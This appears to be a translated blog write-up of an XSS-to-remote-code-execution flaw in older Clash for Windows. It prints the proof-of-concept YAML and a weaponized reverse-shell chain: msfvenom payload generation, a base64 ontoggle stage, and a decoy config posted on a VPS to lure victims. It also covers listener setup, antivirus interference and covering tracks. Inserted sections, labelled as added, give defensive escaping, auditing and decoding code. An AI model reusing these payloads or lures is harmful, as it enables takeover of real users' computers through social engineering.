0x00 Vulnerability Overview
Around February 25, or possibly the night of the 24th, a vulnerability was disclosed in Clash for Windows in which an XSS led to command execution. https://github.com/Fndroid/clash_for_windows_pkg
As a result, all I saw online was a way to pop the calculator; is that really exploiting a vulnerability??? I must admit that most security testers, eager to publish first-hand information, start chasing attention without truly understanding the issue, which I find really frustrating. If you want to be a hacker, please endure the loneliness and focus solely on your goal rather than the flowers and grass you pass along the way.
So I have written up an exploitation here that takes the reproduction further and shows the real harm: using the Clash RCE to get a shell back (getting the target "online"). This article references the operations of Master Bao, hereby declared!
0x01 Impact Scope
Clash for Windows versions below 0.19.08. It has already been patched; just install 0.19.10.
0x02 POC and Principle Analysis
A typical XSS payload: an img tag with an onerror handler that calls eval, which in turn requires child_process and executes calc.exe.
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true
proxy-groups:
  - name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
      - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
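The root cause of this bug class is a renderer that turns a config-supplied proxy name into HTML instead of text; the `require("child_process")` in the payload only works because the Electron window exposes Node APIs to that page. The following is an added example, not code from the original post or from the Clash project: a deliberately unsafe renderer beside a hardened one, plus a checker that flags names carrying markup or event handlers before a config is imported. The function names, the heuristics list and the sample config are my own constructions.

```javascript
// Added example (not from the original post or the Clash project).

// Escape the five characters that matter when text is placed into HTML.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Unsafe pattern: concatenating the name into markup. A name such as
// <img/src="1"/onerror=...> becomes a live element with an event handler.
function renderProxyUnsafe(proxy) {
  return `<li class="proxy">${proxy.name}</li>`;
}

// Hardened form: the name is always rendered as text, never as markup.
function renderProxySafe(proxy) {
  return `<li class="proxy">${escapeHtml(proxy.name)}</li>`;
}

// Heuristics (assumed, not exhaustive) for triaging a config before import:
// a tag, an on*= handler, or a call into eval/atob/require is never a
// legitimate proxy name.
const SUSPICIOUS = [
  /<\s*[a-z!/]/i,               // start of an HTML tag
  /\bon[a-z]+\s*=/i,            // onerror=, ontoggle=, onload= ...
  /\b(eval|atob|require)\s*\(/, // script execution primitives
];

function isSuspiciousName(name) {
  return SUSPICIOUS.some((re) => re.test(String(name)));
}

// Walk a parsed config (proxies, proxy-groups and the group member lists)
// and report every suspicious name with its location.
function auditConfig(config) {
  const findings = [];
  for (const [i, p] of (config.proxies || []).entries()) {
    if (isSuspiciousName(p.name)) findings.push({ path: `proxies[${i}].name`, value: p.name });
  }
  for (const [i, g] of (config['proxy-groups'] || []).entries()) {
    if (isSuspiciousName(g.name)) findings.push({ path: `proxy-groups[${i}].name`, value: g.name });
    for (const [j, ref] of (g.proxies || []).entries()) {
      if (isSuspiciousName(ref)) findings.push({ path: `proxy-groups[${i}].proxies[${j}]`, value: ref });
    }
  }
  return findings;
}

// Constructed sample mirroring the POC above, as it would look after YAML parsing.
const SAMPLE_CONFIG = {
  proxies: [
    { name: 'a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>', type: 'socks5' },
    { name: 'abc', type: 'socks5' },
  ],
  'proxy-groups': [
    { name: 'Auto', type: 'select', proxies: ['abc'] },
  ],
};

console.log(renderProxyUnsafe(SAMPLE_CONFIG.proxies[0])); // live <img> element
console.log(renderProxySafe(SAMPLE_CONFIG.proxies[0]));   // inert &lt;img ... text
console.log(auditConfig(SAMPLE_CONFIG));                  // one finding at proxies[0].name
```

The audit is a pre-import gate, not a substitute for the rendering fix: the escaping in renderProxySafe is what actually closes the bug, while auditConfig gives a user or an administrator a way to reject a shared config before it ever reaches the renderer.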
0x03 Vulnerability Reproduction and Exploitation
Basic Reproduction
Reproducing it as simply as others online, merely popping a calculator, is reproduction and nothing more.
It only confirms that a vulnerability exists by taking someone else's POC and firing it once; the vulnerability still has not been exploited. How to exploit it to expand the harm, even to the point of getting the other party online, needs some research.
Advanced Reproduction and Exploitation: First Learn a Few Knowledge Points
Most people may not know these points; they require development experience in several areas. Of course, you don't need to go very deep into development, just have a rough understanding, at least enough to recognise what a piece of software does and which framework it is written in. Penetration testing must rest on a development foundation, and that foundation takes long-term, in-depth study.
1. Clash is developed on Electron, with Node.js underneath.
2. The details tag and the ontoggle event
When a <details> element is opened or closed, JavaScript is executed:
<details ontoggle="myFunction()">
3. The atob and btoa methods
atob() decodes a base-64 encoded string.
btoa() encodes a string as base-64.
The naming is like Go's Itoa/Atoi: atob() goes from ASCII (the base-64 text) to binary data, and btoa() goes the other way.
4. MSFvenom can search for payloads
msfvenom --list payload | grep windows/x64
5. MSF generates the callback payload
Apps developed on Electron or NW.js (app here broadly includes both PC and mobile) that have an XSS vulnerability can use this MSF payload:
msfvenom -p nodejs/shell_reverse_tcp LHOST=MyIP LPORT=65500 -f raw -o payload.js
6. Copy the payload out and base64-encode it
0x04 Exploiting the Vulnerability—Constructing Payloads and Going Online
After going through the knowledge points above, you should be able to understand the key code here. So what do the other lines before and after it mean?
Actually, it is just a proxy configuration in YAML; you can add some entries for social engineering, to deceive others, top-level social engineering.
This also borrows an idea from file upload: sometimes a one-line webshell simply cannot be parsed and connected from AntSword, but casually adding 100 lines of junk characters makes it connect just fine.
This may be because a file that is too small trips traffic monitoring or a code-level WAF and the upload fails. The same principle applies here: the padding obfuscates, deceives the user, and also increases fault tolerance.
proxies:
  - { name: 🇷🇺Large bandwidth reserved, type: ss, server: xxxxxx.tpxx.top, port: 11901, cipher: chacxxy1305, password: cdx2cxx91b, udp: true }
  ...
  ...
  ...
  - name: <details ontoggle=eval(atob('<base64-encoded payload.js>')); open=></details>
    type: select
    proxies:
      - Bee c
      - autoselect
rules:
  - 'DOMAIN,asdadsa.asdasd.asd.top,DIRECT'
  ....
  ....
  ....
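For the defender or analyst who receives a config like the one above, the interesting part is hidden behind eval(atob('...')). The following is an added example, not from the original post: it pulls every atob('...') argument out of the raw YAML text, base64-decodes it and reports which dangerous primitives the decoded script touches, so the file can be triaged without executing anything. The indicator list and the sample YAML are my own constructions; the sample wraps the calc.exe one-liner from the POC section in the details/ontoggle form shown above.

```javascript
// Added example (not from the original post): static triage of atob() stages
// embedded in a config file.

// Matches atob('...'), atob("...") or atob(`...`) with a base64 body that may
// span whitespace.
const ATOB_CALL = /atob\(\s*(['"`])([A-Za-z0-9+/=\s]+)\1\s*\)/g;

// Indicators (assumed list, not exhaustive) of a Node-side command or
// reverse-connection stage.
const INDICATORS = [
  ['child_process', /child_process/],
  ['exec/spawn',    /\b(exec|spawn|execSync)\s*\(/],
  ['net.connect',   /\bnet\b[\s\S]{0,40}\bconnect\s*\(/],
  ['process.env',   /process\.env/],
];

// Return one record per atob() call: the encoded body, the decoded text and
// the indicator labels that fired on it.
function decodeAtobCalls(text) {
  const results = [];
  for (const m of text.matchAll(ATOB_CALL)) {
    const b64 = m[2].replace(/\s+/g, '');
    const decoded = Buffer.from(b64, 'base64').toString('utf8');
    const hits = INDICATORS.filter(([, re]) => re.test(decoded)).map(([label]) => label);
    results.push({ encoded: b64, decoded, indicators: hits });
  }
  return results;
}

// Constructed sample: the POC's calc.exe stage, base64-wrapped into the
// details/ontoggle form used in the second config.
const STAGE = 'require("child_process").exec("calc.exe");';
const SAMPLE_YAML = [
  'proxy-groups:',
  "  - name: <details ontoggle=eval(atob('" + Buffer.from(STAGE).toString('base64') + "')); open=></details>",
  '    type: select',
  '    proxies:',
  '      - abc',
].join('\n');

for (const r of decodeAtobCalls(SAMPLE_YAML)) {
  console.log('decoded :', r.decoded);
  console.log('flagged :', r.indicators.join(', '));
}
```

Because the decoder never evaluates the stage, it is safe to run over a batch of shared configs; a hit on child_process or exec/spawn in a proxy name is enough on its own to reject the file, and the decoded text is what an incident responder would record.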
1. Save the constructed payload to a file such as BeeNest.yaml and put it on a public VPS, dressed up as: latest configuration file, node updates, fast speed, whatever NEWX CLASS; pure top-level social engineering to induce others to download it.
2. The victim downloads and imports this file.
3. MSF on the public VPS starts listening; since it is Ubuntu, don't forget ufw allow 65500 to open the port.
After many tests with various listening methods, the returning sessions were often dropped quickly. The reason is actually very simple: they were being intercepted by Huorong (the Huorong Security antivirus).
handler -H 0.0.0.0 -P 65500 -p php/meterpreter/reverse_tcp
#############################################################
use exploit/multi/handler
set payload nodejs/shell_reverse_tcp
#############################################################
nc -lvvp 65500
Actually, despite Huorong's interception, clicking enough times eventually succeeds. But it is very unstable; the session may drop right after I receive it.
Alright, turn off Huorong and everything works fine.
Destroy the VPS and run away.
0x05 Summary
1. As long as an app is developed on Electron or NW.js (app here broadly includes both PC and mobile), if it has an XSS you can use this MSF payload and the corresponding listener:
msfvenom -p nodejs/shell_reverse_tcp LHOST=MyIP LPORT=65500 -f raw -o payload.js
################################################################################
use exploit/multi/handler
set payload nodejs/shell_reverse_tcp
set lhost <IP>
set lport <port>
2. Huorong is great. Actually, one could work out a method to bypass Huorong, but I won't research that for now.
3. In researching how to get the other party online, the key was understanding how the Clash software is developed. So in penetration testing a development foundation is essential; I do not ask you to be extremely strong in development, but you should at least be able to recognise known knowledge and relate it to the relevant penetration operations, which takes time, accumulated experience, and a continually broadening base of knowledge. Perhaps this is the inner strength of a martial arts master: even holding Dugu's unique sword, without sufficient inner strength one cannot reach the highest realm of having no sword in hand but a sword in the heart.